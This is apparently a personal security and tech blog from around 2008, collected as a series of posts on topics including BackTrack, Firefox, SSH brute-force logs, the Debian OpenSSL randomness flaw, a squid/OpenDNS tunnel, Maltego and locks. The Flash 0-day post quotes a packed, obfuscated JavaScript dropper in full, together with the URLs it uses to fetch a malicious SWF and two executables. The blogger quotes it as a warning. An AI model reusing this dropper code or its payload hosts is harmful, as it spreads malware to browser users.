In a year or so you can see me doing silly :P

...written about our first meeting, where you said "Vroeger was ik een lekker stuk" and I took a photo of your legs that looked good, not to say great.

I should have written about the conversations we had.

I should have written about the nail biting, before and during the football game.

I should have because the moments mattered to me.

I should have because now they took you, after your screaming alarmed the neighbor, after your neighbor alarmed the police, after the police kicked in the door, after the police warned the ambulance, after the ambulance took you away, after the police took your cellphone, after the doctors called that after the first operation they saw little hope, and after I tried to contact your daughter, and after the second call from the doctors who said there was little hope and after that I found your daughter was informed... but all was too late.

All was too late, but disaster, 'cause it was too early. It should not have been.

Kiek, I should have...

Photo taken on Monday the 23rd of June. Someone 'forgot' something :P

And they do it again: the final release of BackTrack 3 will hit the net any moment now.

Ever since I met Max at some stint at a client, I have been impressed with his bright mind and unbelievable control over the matters he works on. He did an assesment of the wlan setup I had designed and he pinpointed the weaknesses [some publicly known, others, well 'new'] and the strong points which maked up a nice report for management.

Anyway, BT3 is about to hit the tubes soon and now you know first :P

Add high-speed wireless data to the hottest kid on the block and me being regularly in Amsterdam with a keyboard within reach...

So this couple look a good reason to spend a couple of euroos :D

Firefox 3 is about to het the Internet tubes in a couple of hours. Great, or is it?

The fact that Google Browser Sync project is not taking calls nor displaying any word about support of their essential FF extention for FF 3 has made me decide to NOT upgrade.

As much as I liked test driving FF3 [all beta's and RC's] I just do not want to browse without GBS, unless I am given no option.

So here is my appologies to the FireFox 3 team: sorry! But I will retreat my pledge to download FF3 untill GBS is available and will continue to use FF2.

Here's the google teams reply:

Thanks for trying out Google Browser Sync and for all of your feedback. It was a tough call, but we decided to phase out support for Browser Sync. Since the team has moved on to other projects that are keeping them busy, we don't have time to update the extension to work with Firefox 3 or to continue to maintain it.

For those of you who want to continue to use Firefox 2, we'll maintain support for old versions of Google Browser Sync through 2008. After that, we can recommend a few other products that scratch a similar itch. We hope that one of them works for you:

Mozilla Weave [labs.mozilla.com] from Mozilla Labs—Offers bookmark and history synchronization across computers.

Google Toolbar for Firefox [toolbar.google.com]—Store your bookmarks online and access them from any computer online.

Foxmarks Bookmark Synchronizer [addons.mozilla.org]—Synchronizes your bookmarks across all computers where it is installed.

Regards,
The Google Team

But personally I do not want to change too much at a time so I will sit back, enjoy GBS for the comming couple of months, wait till FF3's bugs will be ironed out and then, maybe, switch away from GBS to one of the above mentioned 'replacements'.

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thank Zac Bedell.

Prime time for our beloved FLASH player again: a 0-day has been actively exploited the last couple of days, as reported by Security Focus, SANS, Adobe knows not much more ATM. Served as a file with the jpg extention, that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(ce(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'\');2.3(\'\')}W{2.3("")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

That in the end, downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.

What a pitty!

We lost the most out of touch CEO ever who's ideas, visions and quotes where always mindbending.

For sometime I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.

It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:

Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I acually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".

Photo by Code Poet

I am from the time that dental correction was only cool when done invisible. You would have your holes plugged, most of the time with 'amagaan' but that was for the poor [me]. The cooler people used plastic in teh colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

Nice, I must have been a sleep the last couple of days. Since May 11 02:41:53 my logfiles [who never sleep] started logging a more 'advanced' brute force ssh attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]

1209 attempts for 654 "invalid users" in 49 busy hours from [
grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.

Today is speculation day :D

Zwitserland - Tsjechie 2 - 1
Roemenie - Frankrijk 0 - 2
Portugal - Turkije 1 - 1
Nederland - Italie 3 - 2
Tsjechie - Portugal 2 - 1
Italie - Roemenie 2 - 1
Zwitserland - Turkije 3 - 2
Nederland - Frankrijk 0 - 2
Zwitserland - Portugal 1 - 2
Nederland - Roemenie 2 - 1
Turkije - Tsjechie 0 - 0
Frankrijk - Italie 1 - 2

Oostenrijk - Kroatie 1 - 1
Spanje - Rusland 1 - 2
Duitsland - Polen 1 - 0
Griekenland - Zweden 1 - 3
Kroatie - Duitsland 1 - 2
Zweden - Spanje 0 - 2
Oostenrijk - Polen 3 - 1
Griekenland - Rusland 1 - 2
Polen - Kroatie 1 - 1
Griekenland - Spanje 0 - 2
Oostenrijk - Duitsland 3 - 4
Rusland - Zweden 2 - 1

Zwitserland - Oostenrijk 3 - 1
Duitsland - Tsjechie 2 - 0

Frankrijk - Spanje 3 - 1
Rusland - Italie 2 - 1

Zwitserland - Duitsland 3 - 1
Spanje - Rusland 0 - 1

Zwitserland - Rusland 2 - 3

Kampioen EK2008: Rusland

Hmm, considering the fact that Mark Schuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's SSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Ubuntu is a large Certificate Authority

Does that insinuate all Thawte certificates are ready for a review? :P

Last months have been good for the security market. SPAM rose [it has been since 30 years but who is counting?], BOTNETS grew, CC snooping went bigger and the list was nicely added with two, well, astounding issues within the last 24 hours.

First we have a crypto nub who decides to remove basically all randomness [the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, not security people should not, repeat NOT fiddle with security issues. Specially not packagers who just want things to install cleanly and silently. That bad.

In this case an unnamed individual did not like what he saw as uninitialized data, he removed one line:
MD_Update(&m,buf,j);
That was enough to make ALL SLL certificates [and thus too the SSH keys that are based on SSL] generated on these systems a randomness that is limited to 32.768 options [all possible PID's on UNIX... That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33Ghz to do this.

Luckily for the researchers, HD Moore of metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!

To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particular nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?

Last October David Maynor went to the the NASCAR truck series. Of course he brought his iPhone with and was shocked to see so many open WiFi networks:

So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [hamster too? Maybe? Please?] to the iPhone.

Now they are looking for beta testers with open iPhones. Feel up to the challenge?

Check here!

Never will I forget how we met, how the initial moments where, how deeply I was moved by you and how a profound impact you made on me and my live.

It was a coincidence, no really, it was. It was not as if my live was aimed at that particular event, not that was I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grant parents & parents whispered to each other, hidden for us kids, when saying goodby, where words that ended with something like '...Jerusalem'?

It does not matter. Fact is, that on December the 27th, in the year 1989 you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, shines brighter then you.

Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.

musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and
decisions are made— all without the advice or participation of a single working musician or composer.
Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it
would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.

As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”

In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”

In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music.

They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”

Waking up in a cold sweat, the musician realizes, gratefully, that it was all just
a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How
absurd!”

Meanwhile, on the other side of town, a painter has just awakened from a similar
nightmare…

***********
And all this leads us into a wonderful written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the space invader Paul Lockhart], an assistant professor at Brown Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P

BTW If anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way shape or form?

An eye opener and good read to boot. Enjoy it!

12:41

What gives? A colleague of mine ran into my office and asked me to check Linkedin to see if I could find his profile. We are connected so, sure, I checked my connections. Since I am known to make a spelling error or two, specially with names, I was not convinced that something was wrong when I did not find him in my connections list.

So I used Google, who loves LinkedIn profiles, to see if I got his name correct: I did.

As a matter of fact, Google nicely cached his profile page on LinkedIn. CCIE # et all. So for sure he nor me is not nuts and he did have a LinkedIn profile and we are connected. Something must be wrong with my seach on LinkedIn, right?

Let's copy & paste that name, and CCIE serial, and repeat the search.

No matter what we tried, all we found was this "Dell sales dude" but never the hardcore network'er that stood behind me, I had linked to, and Google had cached.

So I tried some Google-fu to see if more people had their profile removed by LinkedIn, but all I found was people who asked for them selfs to be removed and happy faces that LinkedIn finally let's you remove links to people you once linked to. Silently, to make sure you piss nobody off :P

This is an interesting issue however.

I always check peoples LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to make sure you use the correct wording [or metaphor's when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].

But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection on who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.

So what do you do when you drop of the most valuable professional showroom of the net? How does one prevent that from happening and having a too big an impact on your money making abilities?

What do you get after you've been initially big mouthing Steve at the launch of the iPhone, claiming you know it all for you have been in the GSM cloud business so long?

You get the left overs, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you get not even exclusively, muwaa!!!

Being able to offload 2G handsets into secondary markets will be very useful for Apple if they do launch a 3G version of the iPhone as generally expected.

Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shiit out of people working in his company but who know, now that he found the way in to Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business like usual.

For reasons only known to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to a OpenSuse linux host resolving via OpenDNS and squid to make things complete.

Funny stuff, that I do just because I can.

It is all really easy to get it up and running, nice to have your own tools on a sticky and funnel your wild browsing behavior encrypted to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, but checking is better, as my audit teacher taught me. So the first thing I did was monitoring for data leakage on my local [windows host's] interface: nada. Schade.

Then I went to the remote's host interface to see what showed there: horor, nice! What I saw was part of the resolve queries going to my old and reliable [and we all hate reliable, right?] colocate DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolve file showed that I had correctly added the two opendns entries, and correctly removed the entries passed to the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not nicely obeying the new entries in the resolver file. Naughty squid!

My setup in more detail:

Firefox [2.0.14 on winXP SP2] well, actually it is FireFoxPortable on a 16Gb Flash Voyager.
putty [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888, talking to 127.0.0.1:3128 where squid [Version 2.5.STABLE10] on Suse [2.6.13-15.18 i386]

I have added a boolean option into the URL "about:config" page in Firefox named "network.proxy.socks_remote_dns" and set it to true.

The resolver file on the remote host contains:
cat /etc/resolve
### BEGIN INFO
# # Modified_by: dhcpcd
# Backup: /etc/resolv.conf.saved.by.dhcpcd.eth0
# Process: dhcpcd
# Process_id: 4326
# Script: /sbin/modify_resolvconf
# Saveto:
# Info: This is a temporary resolv.conf created by service dhcpcd.
# The previous file has been saved and will be restored later.
# # If you don't like your resolv.conf to be changed, you
# can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This # variables are placed in /etc/sysconfig/network/config.
# # You can also configure service dhcpcd not to modify it.
# # If you don't like dhcpcd to change your nameserver # settings
# then either set DHCLIENT_MODIFY_RESOLV_CONF=no
# in /etc/sysconfig/network/dhcp, or
# set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
# /etc/sysconfig/network/config or (manually) use dhcpcd
# with -R. If you only want to keep your searchlist, set
# DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or
# (manually) use the -K option.
# ### END INFO
nameserver 208.67.222.222
nameserver 208.67.220.220

And yes, I have set both options to 'no'

To clear the dns 'cache' I used:
/etc/init.d/nscd restart

What puzzled me is the following output when I use my local browser [that tunnels it's requests to the remote host] and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's dns server being lookup2.colo.xxx]:

tcpdump -p -i eth0 port 53

15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]

Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com

16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]

Hope this helps someone trying to use opendns.com too.

Here is a nice variation on misleading google ad's: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P ].

I liked the people who used the ASCII adds last year, I do, I am inn the market for funny ads that make me wonder, think or just laugh.

Unfortunatly, ASCII art ad's are over since Google altered the 'puncuation' rule.

Oh boy I am so exited!

Get it at: http://www.paterva.com/maltego/

All,

After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right be commercial because it's by far the coolest and most useful application I've ever used (OK so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.

Also - as promised - a list of new features/improvements:

* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
o The layout and navigation have been optimized for speed and usability.
o Four layout types to rearrange data the way YOU want it.
o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets saves you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.

If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.

The documentation can be found at http://ctas.paterva.com/wiki

Enjoy responsibly,
Roelof.

57 year old dude tries to avoid a speedtrap by applying the front break and sliding past below the radar:

Did not really work well. Broke his arm _and_ got a ticket.

Whenever I move in to a new appartement, a new office building or take on the responsibility of other property that is secured by a cylinder lock, I exchange it.

The old cylinder and all it's associated keys will be documented and stored for later retrieval.

The new cylinder will be bought by me, at a store I trust and with a security certificate I like and I pay attention that _nothing_ that can identify me or my location gets associated with the certificate for I would not like to have to worry about the where abouts of that data since it is not under my control [the certificate can be used to remake a key without having a copy of the key].

So I pay by cash and have a second lock smith do the installation.

The appartment I moved in recently is a newly build complex. About a 1.000 appartments have been build by 45 different subcontracters who dig holes, lay pipes, pull wires, connect walls, paint doors and insert locks. For whatever it is worth: I do not trust them. The change that one of the workers copies the cuts of my particular key is just something that makes me feel uncomfortable.

Personally I know too little about the inner workings of locks to be able make a valid judgement about the grade of the lock, so I will buy only stff that does comply with the toughest international standards, including ISO 9001/2000, UL, CEN, VDS, SKG, CPC and A2P. Or when in Holland, the SKG [Stichting Kwaliteit Gevelbouw].

It is amazing to see that the price difference between a SKG ** and *** is rather low in comparison to the added features. One of the features I find a must have is the bump key proofing of locks. But all of this is just to prevent the damage free opening of the door.

Other measures need to be taken to prevent the more common 'crowbar style' and the 'Bulgarian' method [drilling]. A good resource of more information on the topic is The Open Organisation Of Lockpickers' that is credited with spreading the word on the issue in Holland, but even more important the concept behind high security lock design by Ross Kinard.

Never mind those old and dusty religions, for get the olt skool printed stuff, do not bother with the 10 rules, forget about diet stuff, reincarnation is of the past, after life is obsolete.

What rules now is Googlology. It's religion on steroids. No need for G*d in heaven, no need for spirits in the sky. Googlology designs and runs it's own heaven, and it's name is 'The Cloud'

The cloud will take care of your data, no matter where you need it, it will be there. The cloud will provide your services with more computing power then it needs, and the some. The cloud will harbour your applications, your email, your videostream, your rants, your pictures, your secrets and your dates, your world, your drawings, your finances, your money, and a whole lot more.

And I should know, since I drink all the Google Gulp from a hose.

